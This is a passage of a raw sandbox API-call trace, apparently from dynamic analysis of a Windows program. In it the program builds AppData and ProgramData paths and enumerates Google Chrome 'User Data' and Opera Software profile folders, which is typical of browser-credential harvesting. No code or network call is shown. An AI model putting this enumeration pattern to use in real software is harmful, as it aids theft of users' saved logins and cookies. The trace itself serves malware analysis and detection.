dwFlags=0x0, lpMem=0x925360 | out: hHeap=0x8e0000) returned 1 [0163.786] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WidevineCdm", cAlternateFileName="WIDEVI~1")) returned 0 [0163.786] FindClose (in: hFindFile=0x8f9a80 | out: hFindFile=0x8f9a80) returned 1 [0163.786] VirtualQuery (in: lpAddress=0x926478, lpBuffer=0x2df58c, dwLength=0x1c | out: lpBuffer=0x2df58c*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.786] GetProcessHeap () returned 0x8e0000 [0163.786] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926478 | out: hHeap=0x8e0000) returned 1 [0163.786] VirtualQuery (in: lpAddress=0x9263e8, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.787] GetProcessHeap () returned 0x8e0000 [0163.787] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9263e8 | out: hHeap=0x8e0000) returned 1 [0163.787] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c593160, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c593160, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x58, dwReserved1=0x10000010, cFileName="User Data", cAlternateFileName="USERDA~1")) returned 0 [0163.787] FindClose (in: hFindFile=0x8f9a40 | out: hFindFile=0x8f9a40) returned 1 [0163.787] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.787] GetProcessHeap () returned 0x8e0000 [0163.787] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0163.787] VirtualQuery (in: lpAddress=0x8efeb0, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x8ef000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x38000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.787] GetProcessHeap () returned 0x8e0000 [0163.787] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8efeb0 | out: hHeap=0x8e0000) returned 1 [0163.787] GetProcessHeap () returned 0x8e0000 [0163.787] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.787] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\ProgramData") returned 0x0 [0163.787] lstrlenW (lpString="C:\\ProgramData") returned 14 [0163.787] lstrlenW (lpString="\\Google\\Chrome") returned 14 [0163.787] GetProcessHeap () returned 0x8e0000 [0163.787] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x3a) returned 0x8f2780 [0163.787] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0163.787] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\Google\\Chrome" | out: lpString1="C:\\ProgramData\\Google\\Chrome") returned="C:\\ProgramData\\Google\\Chrome" [0163.787] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.787] GetProcessHeap () returned 0x8e0000 [0163.787] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.787] lstrlenW (lpString="C:\\ProgramData\\Google\\Chrome") returned 28 [0163.787] lstrlenW (lpString="C:\\ProgramData\\Google\\Chrome") returned 28 [0163.787] lstrlenW (lpString="\\*.*") returned 4 [0163.787] GetProcessHeap () returned 0x8e0000 [0163.787] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x42) returned 0x900390 [0163.787] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData\\Google\\Chrome" | out: lpString1="C:\\ProgramData\\Google\\Chrome") returned="C:\\ProgramData\\Google\\Chrome" [0163.787] lstrcatW (in: lpString1="C:\\ProgramData\\Google\\Chrome", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\Google\\Chrome\\*.*") returned="C:\\ProgramData\\Google\\Chrome\\*.*" [0163.787] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Google\\Chrome\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x7607cb17, ftCreationTime.dwLowDateTime=0xe, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x5c001e, ftLastAccessTime.dwHighDateTime=0xe, ftLastWriteTime.dwLowDateTime=0x2df870, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e75d0, nFileSizeLow=0x0, dwReserved0=0x1e, dwReserved1=0x7607c3d1, cFileName="", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.788] VirtualQuery (in: lpAddress=0x900390, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x900000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x27000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.788] GetProcessHeap () returned 0x8e0000 [0163.788] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x900390 | out: hHeap=0x8e0000) returned 1 [0163.788] VirtualQuery (in: lpAddress=0x8f2780, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x8f2000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x35000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.788] GetProcessHeap () returned 0x8e0000 [0163.788] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f2780 | out: hHeap=0x8e0000) returned 1 [0163.788] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x2 | out: plibNewPosition=0x2) returned 0x0 [0163.788] IStream:SetSize (This=0x9043c0, libNewSize=0x2ff) returned 0x0 [0163.788] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x2ff, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0163.788] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x2 | out: plibNewPosition=0x2) returned 0x0 [0163.788] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0163.789] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfadc*=0x0, cb=0x4, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x4) returned 0x0 [0163.789] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfae8*=0x4, cb=0x2, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x2) returned 0x0 [0163.789] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfaec*=0x0, cb=0x2, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x2) returned 0x0 [0163.789] GetProcessHeap () returned 0x8e0000 [0163.789] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.789] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0163.789] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0163.789] lstrlenW (lpString="\\Opera Software") returned 15 [0163.789] GetProcessHeap () returned 0x8e0000 [0163.789] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x7a) returned 0x926360 [0163.789] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0163.789] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\Opera Software" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Opera Software") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Opera Software" [0163.789] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.789] GetProcessHeap () returned 0x8e0000 [0163.789] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.789] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Opera Software") returned 60 [0163.789] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Opera Software") returned 60 [0163.789] lstrlenW (lpString="\\*.*") returned 4 [0163.789] GetProcessHeap () returned 0x8e0000 [0163.789] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x82) returned 0x9263e8 [0163.789] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Opera Software" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Opera Software") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Opera Software" [0163.789] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Opera Software", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Opera Software\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Opera Software\\*.*" [0163.789] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Opera Software\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x926360, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x926360, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0xa, ftLastWriteTime.dwHighDateTime=0xc, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x909f43, dwReserved1=0x3d00003d, cFileName="\r", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.789] VirtualQuery (in: lpAddress=0x9263e8, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.789] GetProcessHeap () returned 0x8e0000 [0163.789] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9263e8 | out: hHeap=0x8e0000) returned 1 [0163.790] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.790] GetProcessHeap () returned 0x8e0000 [0163.790] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0163.790] GetProcessHeap () returned 0x8e0000 [0163.790] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.790] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0163.790] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0163.790] lstrlenW (lpString="\\Opera Software") returned 15 [0163.790] GetProcessHeap () returned 0x8e0000 [0163.790] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x76) returned 0x8efeb0 [0163.790] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0163.790] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Opera Software" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Opera Software") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Opera Software" [0163.790] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.790] GetProcessHeap () returned 0x8e0000 [0163.790] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.790] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Opera Software") returned 58 [0163.790] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Opera Software") returned 58 [0163.790] lstrlenW (lpString="\\*.*") returned 4 [0163.790] GetProcessHeap () returned 0x8e0000 [0163.790] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x7e) returned 0x926360 [0163.790] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Opera Software" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Opera Software") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Opera Software" [0163.790] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Opera Software", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Opera Software\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Opera Software\\*.*" [0163.790] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Opera Software\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x909f48, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0x2df870, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x58, dwReserved1=0x10000010, cFileName="\r", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.790] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.790] GetProcessHeap () returned 0x8e0000 [0163.790] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0163.790] VirtualQuery (in: lpAddress=0x8efeb0, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x8ef000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x38000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.790] GetProcessHeap () returned 0x8e0000 [0163.790] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8efeb0 | out: hHeap=0x8e0000) returned 1 [0163.790] GetProcessHeap () returned 0x8e0000 [0163.790] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.790] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\ProgramData") returned 0x0 [0163.791] lstrlenW (lpString="C:\\ProgramData") returned 14 [0163.791] lstrlenW (lpString="\\Opera Software") returned 15 [0163.791] GetProcessHeap () returned 0x8e0000 [0163.791] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x3c) returned 0x8f2780 [0163.791] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0163.791] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\Opera Software" | out: lpString1="C:\\ProgramData\\Opera Software") returned="C:\\ProgramData\\Opera Software" [0163.791] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.791] GetProcessHeap () returned 0x8e0000 [0163.791] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.791] lstrlenW (lpString="C:\\ProgramData\\Opera Software") returned 29 [0163.791] lstrlenW (lpString="C:\\ProgramData\\Opera Software") returned 29 [0163.791] lstrlenW (lpString="\\*.*") returned 4 [0163.791] GetProcessHeap () returned 0x8e0000 [0163.791] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x44) returned 0x900390 [0163.791] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData\\Opera Software" | out: lpString1="C:\\ProgramData\\Opera Software") returned="C:\\ProgramData\\Opera Software" [0163.791] lstrcatW (in: lpString1="C:\\ProgramData\\Opera Software", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\Opera Software\\*.*") returned="C:\\ProgramData\\Opera Software\\*.*" [0163.791] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Opera Software\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x7607cb17, ftCreationTime.dwLowDateTime=0xe, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x66001e, ftLastAccessTime.dwHighDateTime=0x10, ftLastWriteTime.dwLowDateTime=0x2df870, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e75d0, nFileSizeLow=0x0, dwReserved0=0x1e, dwReserved1=0x7607c3d1, cFileName="", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.791] VirtualQuery (in: lpAddress=0x900390, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x900000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x27000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.791] GetProcessHeap () returned 0x8e0000 [0163.791] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x900390 | out: hHeap=0x8e0000) returned 1 [0163.791] VirtualQuery (in: lpAddress=0x8f2780, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x8f2000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x35000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.791] GetProcessHeap () returned 0x8e0000 [0163.791] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f2780 | out: hHeap=0x8e0000) returned 1 [0163.791] GetProcessHeap () returned 0x8e0000 [0163.791] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.791] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0163.791] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0163.791] lstrlenW (lpString="\\Opera Software") returned 15 [0163.791] GetProcessHeap () returned 0x8e0000 [0163.791] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x7a) returned 0x926360 [0163.791] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0163.792] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\Opera Software" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Opera Software") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Opera Software" [0163.792] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.792] GetProcessHeap () returned 0x8e0000 [0163.792] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.792] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Opera Software") returned 60 [0163.792] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Opera Software") returned 60 [0163.792] lstrlenW (lpString="\\*.*") returned 4 [0163.792] GetProcessHeap () returned 0x8e0000 [0163.792] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x82) returned 0x9263e8 [0163.792] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Opera Software" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Opera Software") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Opera Software" [0163.792] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Opera Software", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Opera Software\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Opera Software\\*.*" [0163.792] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Opera Software\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x926360, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x926360, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0xa, ftLastWriteTime.dwHighDateTime=0xc, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x909f43, dwReserved1=0x3d00003d, cFileName="\r", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.792] VirtualQuery (in: lpAddress=0x9263e8, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.792] GetProcessHeap () returned 0x8e0000 [0163.792] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9263e8 | out: hHeap=0x8e0000) returned 1 [0163.792] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.792] GetProcessHeap () returned 0x8e0000 [0163.792] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0163.792] GetProcessHeap () returned 0x8e0000 [0163.792] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.792] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0163.792] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0163.792] lstrlenW (lpString="\\Opera Software") returned 15 [0163.792] GetProcessHeap () returned 0x8e0000 [0163.792] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x76) returned 0x8efeb0 [0163.792] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0163.792] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Opera Software" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Opera Software") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Opera Software" [0163.792] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.792] GetProcessHeap () returned 0x8e0000 [0163.792] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.792] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Opera Software") returned 58 [0163.793] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Opera Software") returned 58 [0163.793] lstrlenW (lpString="\\*.*") returned 4 [0163.793] GetProcessHeap () returned 0x8e0000 [0163.793] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x7e) returned 0x926360 [0163.793] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Opera Software" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Opera Software") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Opera Software" [0163.793] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Opera Software", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Opera Software\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Opera Software\\*.*" [0163.793] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 